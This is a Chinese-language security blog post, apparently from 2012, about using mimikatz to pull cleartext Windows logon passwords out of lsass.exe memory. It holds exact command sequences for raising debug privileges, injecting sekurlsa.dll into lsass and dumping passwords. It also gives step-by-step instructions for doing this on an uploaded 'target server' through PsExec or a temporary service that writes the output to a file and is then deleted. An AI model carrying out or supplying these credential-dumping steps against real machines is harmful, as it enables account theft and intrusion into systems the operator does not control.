輕量級調試器神器 – mimikatz – 直接抓取 Windows 純文字密碼！

昨天有朋友發了個法國佬寫的神器叫 mimikatz
讓我們看下

神器:

http://blog.gentilkiwi.com/mimikatz

還有一篇用這個神器直接從 lsass.exe 裡擷取windows處於active狀態帳號純文字密碼的文章

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

自己嘗試了下用 win2008 r2 x64 來測試

最後測試成功 wdigest 就是我的純文字密碼

 

我還測過密碼複雜度在14位以上

包含數字 大小寫字母 特殊字元的密碼

一樣能抓出純文字密碼來

以前用 wce.exe 或
lslsass.exe 通常是只能從記憶體裡頂多抓出active帳號的
lm hash 和 ntlm hash

但用了這個神器抓出純文字密碼後

由此我們可以反推斷 在 lsass.exe
裡並不是只存有 lm hash 和
ntlm hash 而已

應該還存在有你的純文字密碼經過某種密碼編譯演算法
(注意: 是密碼編譯演算法 而不是hash演算法 密碼編譯演算法是可逆的 hash演算法是無法復原的)

這樣這個密碼編譯演算法是可逆的 能被解密出明文

所以進程注入 lsass.exe 時 所調用的
sekurlsa.dll 應該包含了對應的解密演算法

逆向功底比較好的童鞋可以嘗試去逆向分析一下

 

然後這個神器的功能肯定不僅僅如此 在我看來它更像一個輕量級調試器

可以提升進程許可權 注入進程 讀取進程記憶體等等

下面展示一個 讀取掃雷遊戲的記憶體的例子

我們還可以通過pause命令來掛起該進程 這個時候遊戲的時間就靜止了

 

總之這個神器相當華麗 還有更多能力有待各黑闊們挖掘 =..=~

站長評論：

抓取 lsass.exe 中的使用者純文字密碼：

//提升許可權privilege::debug//注入dllinject::process lsass.exe sekurlsa.dll//抓取密碼@getLogonPasswords

經測試，通殺：

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

貌似只有 Windows 2000 無法使用，最低支援 Windows XP。

不過，2000/xp 可以用以前的 FindPassword ，Windows 2003 - Windows 7 微軟的這個處理機制沒有變。

域也可以，理論上是沒問題的，登入過都在 lsass.exe 裡面。

原理就是登陸的時候輸入的密碼，經過 lsass.exe 裡的 wdigest 和 tspkg 兩個模組調用後，它們對之進行加密處理，而沒有進行擦除，而且該加密通過特徵可以定位，並且按照微軟的演算法可逆。

只要登陸過，就可以抓出來，它進行枚舉的，這一切都是微軟的錯。

簡單地說，在 Windows 中，當使用者登入時，lsass.exe 使用一個可逆的演算法，加密過的純文字密碼，並且把密文儲存在記憶體中，沒有清理，然後可以抓出來，還原。

也就是說，開機以後，只要是登陸過的使用者，在沒重啟前（因為重啟記憶體就清零了，這裡不包括使用其他方法清理記憶體），都可以抓出來，登出也是無用的，因為記憶體中的密碼並沒有清除，所以還是可以抓出來的。

我想微軟可能會出個補丁，清理這塊……

這玩意兒功能還有很多，自己看看參數，例如：ts，是調用 mimikatz.sys 隱藏登陸的終端。

這應該算是密碼泄露，很嚴重的漏洞，估計微軟會出補丁。

2012-2-27 3:10:48 補充：

看雪已經有詳細的原理分析文章了，並且還在更新，地址：http://bbs.pediy.com/showthread.php?t=146884

在遠程終端（3389、mstsc.exe）、虛擬桌面中抓取密碼的方法：

通常你在遠程終端中運行該程式會提示：儲存空間不足，無法處理此命令。

這是因為在終端模式下，不能插入遠線程，跨會話不能注入，你需要使用如下方法執行該程式：

首先提取幾個檔案，只抓取密碼的話，只需要這幾個檔案：

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包後上傳至目標伺服器，然後解壓釋放，注意路徑中絕對不能有中文（可以有空格）！否則載入DLL的時候會報錯：找不到檔案。

然後使用以下任何一種方法即可抓取密碼：

//最簡單實用的方法，使用 PsExec.exe 啟動。//在系統帳戶中運行 cmd.exe，或者直接運行 mimikatz.exepsexec -s cmd.exe//啟動 mimikatz.exeC:\mimikatz_trunk\Win32\mimikatz.exe//提升許可權privilege::debug//注入dll，要用絕對路徑！並且路徑中絕對不能有中文（可以有空格）！inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"//抓取密碼@getLogonPasswords//退出，不要用 ctrl + c，會導致 mimikatz.exe CPU 佔用達到 100%，死迴圈。exit//*********************************************************//使用 At 啟動at ***//*********************************************************//建立服務方法sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"sc start getpasswordsc delete getpassword//*********************************************************//telnet 遠程命令管道telnet ****

部分內容轉自：http://hi.baidu.com/hackercasper/blog/item/b080dbd05eb6a5cc562c8461.html

本文“輕量級調試器神器 - mimikatz - 直接抓取 Windows 純文字密碼！”，來自：Nuclear'Atk 網路安全研究中心，本文地址：http://lcx.cc/?i=2265，轉載請註明作者及出處！